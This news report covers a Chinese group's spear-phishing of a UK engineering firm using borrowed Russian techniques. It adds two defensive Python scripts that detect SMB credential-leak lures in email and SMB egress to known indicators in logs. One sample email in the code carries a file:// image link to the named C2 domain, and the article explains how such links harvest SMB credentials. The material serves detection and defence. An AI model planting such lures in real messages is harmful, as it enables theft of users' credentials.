Chinese hackers have targeted a UK-based engineering company using technology and tactics from Russian threat groups Dragonfly and APT28, according to security researchers.
In a blog post, researchers from Recorded Future said that the hackers were using the same infrastructure as a reported campaign by Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections.
In this instance, employees of a UK-based engineering company were among the targeted victims of a spear-phishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights and Chinese development.
"We believe TEMP.Periscope reused published TTPs either to increase the group’s chances of success in gaining access to the victim network or to evade attribution by laying false flags to confuse researchers," the company's Insikt Group said.
Researchers said that the hackers likely used a command and control (C2) domain, scsnewstoday[.]com, that was identified in a recent TEMP.Periscope campaign targeting the Cambodian government. The attackers used a Chinese email client, Foxmail, to send the spear-phishing attack.
They noted that the attack used a distinctive technique documented as a Dragonfly TTP in targeting critical infrastructure: a "file://" path embedded in the spear-phishing email points at a malicious C2 domain, so that the victim's machine attempts to authenticate to it over SMB and exposes the user's SMB credentials.
The attack probably made use of a version of the open source tool Responder as an NBT-NS poisoner. APT28 used Responder in attacks against travellers staying at hotels in 2017.
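The credential-leak technique described above works because mail clients and Office viewers resolve `file://` URLs and UNC paths over SMB, so a reference to a host outside the organisation triggers an outbound authentication attempt. One defensive check a mail gateway can apply is to extract every such host from a message body and flag those that are not internal. The Python below is an added example written for this page, not code from Recorded Future or from the article; the sample message, the `corp.example` suffix and the file names are constructed, while `scsnewstoday.com` is the C2 domain the article names (printed there defanged).

```python
import ipaddress
import re
from typing import List, Set

# Constructed sample of a spear-phishing message body; it is not a real lure.
# scsnewstoday.com is the C2 domain the article names (defanged there as
# scsnewstoday[.]com); corp.example and the file names are made up.
SAMPLE_EMAIL = r"""
<html><body>
<p>Please review the agenda before Monday's meeting.</p>
<img src="file://scsnewstoday.com/images/logo.png" width="1" height="1">
<a href="\\fileserver.corp.example\public\agenda.docx">Agenda (internal share)</a>
<a href="file:///C:/Users/Public/readme.txt">Local copy</a>
</body></html>
"""

# file://HOST/... : the host part runs up to the next slash, backslash,
# whitespace, quote or angle bracket. For file:///C:/... the host is empty,
# which marks a local path rather than a remote server.
FILE_URL_RE = re.compile(r"""file://([^/\\\s"'<>]*)""", re.IGNORECASE)
# \\HOST\share : a UNC path, which Windows also resolves over SMB.
UNC_PATH_RE = re.compile(r"\\\\([A-Za-z0-9][A-Za-z0-9.\-]*)\\")


def extract_remote_hosts(body: str) -> List[str]:
    """Return every host named by a file:// URL or UNC path in the body.

    Empty hosts (file:///C:/...) are dropped: a local path cannot make the
    client authenticate to a remote server.
    """
    hosts = [h for h in FILE_URL_RE.findall(body) if h]
    hosts += UNC_PATH_RE.findall(body)
    return hosts


def is_internal_host(host: str, internal_suffixes: Set[str]) -> bool:
    """True when the host is a private IP or ends with an internal DNS suffix."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        pass  # not an IP literal; fall through to the DNS-suffix check
    lowered = host.lower().rstrip(".")
    return any(lowered == s or lowered.endswith("." + s) for s in internal_suffixes)


def find_external_smb_lures(body: str, internal_suffixes: Set[str]) -> List[str]:
    """Hosts the recipient's client would try to reach over SMB that are not
    part of the organisation: the references worth blocking or alerting on
    at the mail gateway. Order of first appearance is preserved."""
    flagged: List[str] = []
    for host in extract_remote_hosts(body):
        if not is_internal_host(host, internal_suffixes) and host not in flagged:
            flagged.append(host)
    return flagged


if __name__ == "__main__":
    # corp.example is the constructed internal DNS suffix for this sample.
    for host in find_external_smb_lures(SAMPLE_EMAIL, {"corp.example"}):
        print(f"external SMB reference in message body: {host}")
```

The internal share and the local `file:///C:` path are left alone; only the reference to the external domain is reported, which is the one that would leak an SMB authentication attempt outside the network.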
The UK engineering company was previously targeted by TEMP.Periscope in a May 2017 campaign with the same C2 infrastructure that was used in targeting US engineering and academic entities later in September 2017, as detailed in Proofpoint’s Leviathan report.
"Recorded Future expects TEMP.Periscope to continue to target organisations in the high-tech defence and engineering sectors," researchers said.
"The Chinese strategic requirement to develop advanced technology, particularly in marine engineering, remains an intense focus as China looks to dominate the South China Sea territory."
"We believe TEMP.Periscope will continue to use commodity malware because it is still broadly successful and relatively low cost for them to use. They will continue to observe 'trending' vulnerabilities to exploit and use techniques that have been publicly reported in order to gain access to victim networks."
Researchers said that organisations should configure intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defence mechanisms in place to alert on — and upon review, consider blocking illicit connection attempts from — the external IP addresses and domains listed in the blog post.
Organisations should also monitor and restrict SMB traffic across their networks, particularly external attempts to authenticate via SMB.
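Both recommendations, alerting on the published indicators and watching for SMB authentication that crosses the network edge, can be checked mechanically against flow or firewall logs. The Python below is an added example written for this page, not code from Recorded Future or the article. The key=value log layout, the internal address ranges and the 203.0.113.40 watchlist entry are constructed for the example; the `scsnewstoday.com` domain is the one named in the article.

```python
import ipaddress
from typing import Dict, List, Set, Tuple

# Constructed firewall/flow log in a plain key=value layout; it is not any
# vendor's real format. 10.20.0.0/16 plays the organisation's network and
# 203.0.113.0/24 (documentation space) stands in for the internet.
SAMPLE_LOG = """\
ts=2018-07-02T09:14:03Z src=10.20.1.55 dst=203.0.113.40 proto=tcp dport=445 dns=scsnewstoday.com action=allow
ts=2018-07-02T09:14:03Z src=10.20.1.55 dst=203.0.113.40 proto=udp dport=137 dns=- action=allow
ts=2018-07-02T09:15:11Z src=10.20.1.55 dst=10.20.0.10 proto=tcp dport=445 dns=fileserver.corp.example action=allow
ts=2018-07-02T09:16:42Z src=10.20.1.71 dst=203.0.113.9 proto=tcp dport=443 dns=update.vendor.example action=allow
ts=2018-07-02T09:17:05Z src=203.0.113.77 dst=10.20.0.10 proto=tcp dport=445 dns=- action=allow
"""

# Indicator watchlist: the C2 domain the article names (defanged there as
# scsnewstoday[.]com) plus a constructed IP placeholder standing in for the
# addresses listed in the Recorded Future blog post.
WATCHLIST: Set[str] = {"scsnewstoday.com", "203.0.113.40"}

# The organisation's own address space, configured explicitly rather than via
# ip.is_private, which also covers documentation ranges such as 203.0.113.0/24
# and would mis-label the sample's "internet" hosts as internal.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Ports used by SMB and by the NetBIOS name/datagram services.
SMB_PORTS = {("tcp", 445), ("tcp", 139), ("udp", 137), ("udp", 138)}


def parse_line(line: str) -> Dict[str, str]:
    """Split 'key=value key=value ...' into a dict; tokens without '=' are ignored."""
    fields: Dict[str, str] = {}
    for token in line.split():
        if "=" in token:
            key, _, value = token.partition("=")
            fields[key] = value
    return fields


def is_external(ip_text: str) -> bool:
    """True when the address lies outside every configured internal range."""
    ip = ipaddress.ip_address(ip_text)
    return not any(ip in net for net in INTERNAL_NETS)


def classify(fields: Dict[str, str], watchlist: Set[str]) -> List[str]:
    """Return the reasons (possibly none) why one flow record deserves an alert."""
    reasons: List[str] = []
    src, dst = fields.get("src", ""), fields.get("dst", "")
    proto = fields.get("proto", "").lower()
    try:
        dport = int(fields.get("dport", "0"))
    except ValueError:
        dport = 0
    try:
        src_ext, dst_ext = is_external(src), is_external(dst)
    except ValueError:
        return ["unparseable src/dst address"]

    # SMB or NetBIOS crossing the perimeter in either direction.
    if (proto, dport) in SMB_PORTS:
        if not src_ext and dst_ext:
            reasons.append("outbound SMB/NetBIOS to external host")
        elif src_ext and not dst_ext:
            reasons.append("inbound SMB/NetBIOS from external host")

    # Destination IP or the name it was resolved from is a known indicator.
    if dst in watchlist or fields.get("dns", "-").lower() in watchlist:
        reasons.append("destination on indicator watchlist")
    return reasons


def scan(log_text: str, watchlist: Set[str]) -> List[Tuple[int, List[str]]]:
    """Run classify() over every non-empty line; return (line number, reasons) hits."""
    hits: List[Tuple[int, List[str]]] = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        reasons = classify(parse_line(line), watchlist)
        if reasons:
            hits.append((number, reasons))
    return hits


if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG, WATCHLIST):
        print(f"line {number}: {'; '.join(reasons)}")
```

Internal-to-internal SMB (line 3) and ordinary HTTPS egress (line 4) produce nothing; the two records to the C2 host are flagged twice over, once for the protocol leaving the network and once for the indicator match, and the unsolicited inbound SMB attempt on line 5 is caught by the direction check alone.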
Gregory Webb, CEO at Bromium, told SC Media UK that the platform criminality model is productising malware and making cyber-crime as easy as shopping online.
"Not only is it easy to access cyber-criminal tools, services and expertise: it means enterprises and governments alike are going to see more sophisticated, costly and disruptive attacks as the ‘web of profit’ continues to gain momentum. We can’t solve this problem using old thinking or outmoded technology. It’s time for new approaches," he said.
"We have to understand and tackle the underlying economic ecosystem that enables, funds and supports criminal activity on a global scale to stem the tide and better protect ourselves. By better understanding the systems that support cyber-crime, the security community can better understand how to disrupt and stop them."
Tom Van de Wiele, principal security consultant at F-Secure, told SC Media UK that the top reason nation states reuse each other's attacks is that they work. There are also efficiencies to be gained: preparing attack scenarios and making sure infrastructure and tooling are in place costs attackers time and money.
"Some of the tooling is available for the highest bidder on the black market and there is a whole food chain of people making only certain parts of the tooling or infrastructure, e.g. droppers, C2 infrastructure, hosting of malware, rogue certificates, etc. If attackers can steal from each other to bring down the cost and be more effective, then that is what they will do. Add to that the fact it provides plausible deniability – or at least the capability to muddy the waters even more when it comes to attribution – then you’ll see that stealing attacks and methods is just part of the MO of attackers," he said.